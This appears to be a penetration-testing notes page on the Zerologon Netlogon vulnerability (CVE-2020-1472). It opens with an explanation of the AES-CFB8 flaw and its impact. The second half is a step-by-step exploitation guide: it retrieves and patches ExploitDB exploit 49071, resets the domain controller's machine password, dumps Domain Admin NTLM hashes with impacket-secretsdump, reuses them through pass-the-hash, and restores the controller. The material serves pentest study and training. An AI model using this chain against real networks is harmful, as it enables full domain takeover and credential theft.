Zerologon is an elevation of privilege vulnerability when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka ‘Netlogon Elevation of Privilege Vulnerability’.
Zerologon (CVE-2020-1472) is a critical vulnerability that affects Windows servers. Given certain circumstances, this vulnerability can allow an attacker to bypass authentication and then gain administrator-level privileges in a matter of seconds.
Zerologon is a vulnerability that is able to bypass authentication when a user connects to the domain controller. When a user connects to the domain controller, a process called the Netlogon Remote Protocol is used to help identify and authenticate users and client computers before they are granted access to the network. The main purpose of this process is to help domain controllers identify, authenticate, and facilitate the many thousands of users logging into the server.
Like other processes that are associated with login functionality, the Netlogon contains a feature that allows users to update their passwords. This feature in general is a convenient feature since it allows system administrators to change passwords for users who have forgotten their credentials. However, this functionality plays a key role in how the Zerologon vulnerability works and how it can be so lethal. Although this is only one aspect of why this vulnerability is so dangerous, the second aspect is due to the encryption that is implemented.
The way that the encryption method (AES-CFB8) was implemented contained a fatal flaw. Successful exploitation of this encryption method ultimately bypasses any cryptography that is used during the Netlogon function and undermines all authentication. As a result, an attacker is able to gain access to the network by successfully impersonating a valid user, and therefore granted access, despite not having the correct credentials.
To gain access to the internal network, an attacker can bypass authentication by tricking the domain controller by impersonating as a valid user without knowing the credentials of the user. The attacker is able to trick the domain controller because of the flaw in the encryption that was insecurely implemented during authentication (AES-CFB8). Once an attacker has been able to impersonate another user, the attacker is able to change the user’s password to any password of the attacker’s choice or even have a blank password.
What makes Zerologon so dangerous is its ability to impersonate as the domain controller itself and once authenticated, its ability to change the domain controller’s password. Ultimately, an attacker that is able to control the domain controller gains administrative access and therefore is able to fully control the network with access to any service or resource.
In order to impersonate another user, the Zerologon attack exploits the NetLogon function. This attack affects the communication between the user’s computer and the server (domain controller). Due to the flaw in the way that the encryption is used, if an attacker were to modify their request to just contain zeros in certain fields, it would cause the encryption to return a value that the server accepts and successfully validates regardless of whether the correct credentials were supplied.
It was discovered that if enough requests (on average 256) were made containing these fields of 0s, the server would successfully validate one of the requests despite the lack of valid credentials. After being authenticated, the attacker has the ability to change the password of any computer account or the domain controller itself.
An important note to mention is that this vulnerability does not allow attackers to break into Windows networks. The vulnerability is only possible if the attacker possesses the ability to connect to the domain controller in the first place. This vulnerability can be considered to be an insider attacker or more formally, a privilege escalation vulnerability. Privilege escalation vulnerabilities are vulnerabilities that enable an attacker to gain access to other users on the network with either the same level or higher level of access control.
- Zerologon Vulnerability: What is it and what you need to know?
- Active Directory Attacks (good example on Zerologon exploitation)
- CVE-2020-1472 Detail (NVD)
- ZeroLogon – Netlogon Elevation of Privilege (ExploitDB)
- Netlogon Elevation of Privilege Vulnerability (Microsoft)
A patch was released in August 2020.
Check if vulnerable
Should return “ZEROLOGON […] VULNERABLE”
crackmapexec smb $IP -u $USER -p $PASS -d example.com -M zerologonExploit
Search for zerologon exploits
searchploit zerologonMirror the exploit 49071
searchsploit -m 49071Fix the exploit code
The exploit code contains broken lines in functions authenticate and main, fix them!
'checking target, attempting to authenticate %d max attempts' % self.maxdescription='CVE-2020-1472 ZeroLogon Exploit - Netlogon Elevation of Privilege',help='What to do (default check): [check|restore|exploit]')help='The plaintext password to use to reset the DC')help='The hex password to use to restore the DC (recommended)')help='Max attempts to authenticate with the DC (usually ~300 or less)')Usage
NOTE – Exploitation will break the DC until restored
DC_NAME=DC01 # NETBIOS NAME, look in nmap scan, without domain
DC_IP=x.x.x.x1. Check the DC – usually ~300 attempts, use the NETBIOS name not the FQDN:
python3 49071.py -do check -target $DC_NAME -ip $DC_IP2. Exploit the DC – this will break the DC until restored:
python3 49071.py -do exploit -target $DC_NAME -ip $DC_IP3. Dump the DC – for the Domain Admins hashes, this will not contain the machine hex-pass:
impacket-secretsdump -just-dc -no-pass ${DC_NAME}\$@${DC_IP} > secretdump.txtYou can now log in using these hashes using impacket-psexec. See Impacket.
4. Dump the DC again – use the Domain Admins hash to get the machines hex-pass:
Look for the LM:NTLM hash of a domain administrator in previous dump. Need to know who is domain admin first (AD enum).
USER=adminuser # Domain administrator username
DOMAIN=example.comgrep $USER secretdump.txtgrep $USER secretdump.txt | cut -d ":" -f3,4impacket-secretsdump -no-pass -hashes <LMHASH>:<NTHASH> ${DOMAIN}/${USER}@${DC_IP} > secretdump_admin.txt5. Restore target – this fixes the DC:
HEXPASS=$(grep hex secretdump_admin.txt | cut -d ":" -f3)python3 49071.py -do restore -target $DC_NAME -ip $DC_IP -hex $HEXPASS